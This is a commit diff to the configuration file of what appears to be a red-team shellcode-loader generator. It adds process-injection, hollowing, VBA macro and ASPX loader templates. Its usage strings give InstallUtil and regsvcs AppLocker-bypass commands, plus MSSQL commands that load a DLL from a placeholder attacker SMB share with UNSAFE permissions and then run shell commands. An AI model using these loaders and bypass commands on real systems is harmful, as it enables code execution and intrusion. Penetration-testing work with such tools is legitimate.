RegSvcs & RegAsm support for .NET

--- a/core/config/default.ini
+++ b/core/config/default.ini
@@ -4,8 +4,7 @@ clx86_compiler =
 clx64_compiler =
 masmx86_compiler =
 masmx64_compiler =
-cscx86_compiler = C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
-cscx64_compiler = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
+vba_injector = core/utils/VBAInjector/VBAInjector.exe
 clangx86_compiler =
 clangx64_compiler =
 llvmx86_compiler =
@@ -33,6 +32,7 @@ cpp_template_file = ${loader_template}/template.cpp
 cs_template_file = ${loader_template}/template.cs
 pwsh_template_file = ${loader_template}/template.ps1
 vba_template_file = ${loader_template}/template.vba
+strong_name_key = ${loader_template}/key.snk
 
 [PLACEHOLDERS]
 shellcode = ####SHELLCODE####
@@ -45,13 +45,20 @@ include = //####INCLUDE####
 define = //####DEFINE####
 syscall = //####SYSCALL####
 evasion = //####EVASION####
-process = //####PROCESS####
+inject_process = ####PROCESS####
+inject_process_path = ####PROCESS_PATH####
 unhook = //####UNHOOK####
 args = //####ARGS####
 delay = //####DELAY####
+injection = //####INJECTION####
 find_process = //####FIND_PROCESS####
-shellcode_variable = encoded
 shellcode_type = ####SHELLCODE_TYPE####
+class_name = ####CLASS_NAME####
+function_name = ####FUNCTION_NAME####
+entry_args = ####ENTRY_ARGS####
+shellcode_variable = encoded
+strong_name_required = //####STRONG_NAME_REQUIRED####
+
 
 ; the compiler_argument should not define .DLL compilation options (e.g /target:library)
 ; It's already defined using the output_format parameters
@@ -59,7 +66,7 @@ shellcode_type = ####SHELLCODE_TYPE####
 [DEBUG]
 encoders = False
 shellcode = False
-compiler = True
+compiler = False
 evasion = False
 syscalls = False
 
@@ -97,10 +104,31 @@ compiler_args = -r:System.Configuration.Install
 custom_output = You may run this payload normaly: "evil-sc.exe" \nOr using installUtil to bypass AppLocker: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe"
 
 [windows_cs:InstallUtilPwsh]
-expected_format = RAW_BIN
+expected_format = TEXT
 output_format = .exe
 compiler_args = -r:System.Configuration.Install -r:core/templates/headers/System.Management.Automation.dll
 custom_output = Run it using InstallUtil (AppLocker Bypass): "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe"
+
+[windows_cs:NtMapViewOfSection]
+expected_format = RAW_BIN
+output_format = .exe
+
+[windows_cs:MssqlCmd.dll]
+expected_format = TEXT
+output_format = .dll
+compiler_args = -r:System.Data
+custom_output = After enabling CLR, Load the DLL in MSSQL as follows: \nCREATE ASSEMBLY my_assembly FROM '\\<ATTACKING_IP>\fileserver\evil-sc.dll' WITH PERMISSION_SET = UNSAFE; \n"CREATE PROCEDURE [dbo].[CustSQLCmd] @cmd NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[CustSQLCmd]; \nCustSQLCmd 'whoami'  \nFor more details: https://red.infiltr8.io/web-pentesting/infrastructures/dbms/exploit-databases#custom-clr-assemblies
+
+[windows_cs:MssqlRunner.dll]
+expected_format = RAW_BIN
+output_format = .dll
+compiler_args = -r:System.Data
+custom_output = After enabling CLR, Load the DLL in MSSQL as follows: \nCREATE ASSEMBLY my_run FROM '\\<ATTACKING_IP>\fileserver\evil-sc.dll' WITH PERMISSION_SET = UNSAFE; \nCREATE PROCEDURE [dbo].[CustSQLRunner] AS EXTERNAL NAME [my_run].[StoredProcedures].[CustSQLRunner]; \nCustSQLRunner  \nFor more details: https://red.infiltr8.io/web-pentesting/infrastructures/dbms/exploit-databases#custom-clr-assemblies
+
+[windows_cs:PowerSpace]
+expected_format = TEXT
+output_format = .exe
+compiler_args = -r:core/templates/headers/System.Management.Automation.dll
 
 [windows_cs:MockingJay]
 expected_format = RAW_BIN
@@ -108,10 +136,17 @@ output_format = .exe
 compiler_args = -r:System.Configuration.Install
 custom_output = You may run this payload normaly: "evil-sc.exe" \nOr using installUtil to bypass AppLocker: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe"
 
-
-[windows_cs:NtMapViewOfSection]
-expected_format = RAW_BIN
+[windows_cs:Reflection]
+expected_format = DOTNET_BIN,DOTNET_DLL
 output_format = .exe
+
+[windows_cs:RegSvcsThread.dll]
+expected_format = RAW_BIN
+output_format = .dll
+compiler_args = -r:System.EnterpriseServices
+custom_output = Run the dll using one of following commands: \nC:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll\n
+
+
 
 [windows_js:VenomaToJs]
 expected_format = RAW_BIN
@@ -129,6 +164,10 @@ output_format = .ps1
 expected_format = RAW_BIN
 output_format = .ps1
 
+[windows_pwsh:PowerHollowObf]
+expected_format = RAW_BIN
+output_format = .ps1
+
 [windows_pwsh:PowerInject]
 expected_format = RAW_BIN
 output_format = .ps1
@@ -137,13 +176,54 @@ output_format = .ps1
 expected_format = DOTNET_BIN,DOTNET_DLL
 output_format = .ps1
 
-[windows_vba:Inject]
+[windows_pwsh:cmd]
+expected_format = TEXT
+output_format = .ps1
+
+[windows_vba:CreateRemoteThread]
 expected_format = RAW_BIN
 output_format = .vba
 
-[windows_vba:Runner]
+[windows_vba:CreateLocalThread]
 expected_format = RAW_BIN
 output_format = .vba
+
+[windows_vba:cmd]
+expected_format = TEXT
+output_format = .vba
+
+[windows_vba:Hollow]
+expected_format = RAW_BIN
+output_format = .vba
+
+[windows_vba:QueueUserAPC]
+expected_format = RAW_BIN
+output_format = .vba
+
+[windows_vba:EnumCallback]
+expected_format = RAW_BIN
+output_format = .vba
+
+[windows_vba:VectoredHandler]
+expected_format = RAW_BIN
+output_format = .vba
+
+[windows_vba:WmiCmd]
+expected_format = TEXT
+output_format = .vba
+custom_output = This template uses WMI dechaining, so still use x64 shellcode even if you are targeting x86 word!
+
+[windows_aspx:NtMapViewOfSection]
+expected_format = RAW_BIN
+output_format = .aspx
+
+[windows_aspx:CreateRemoteThread]
+expected_format = RAW_BIN
+output_format = .aspx
+
+[windows_aspx:CreateThread]
+expected_format = RAW_BIN
+output_format = .aspx
 
 [linux:SimpleExec]
 expected_format = RAW_BIN
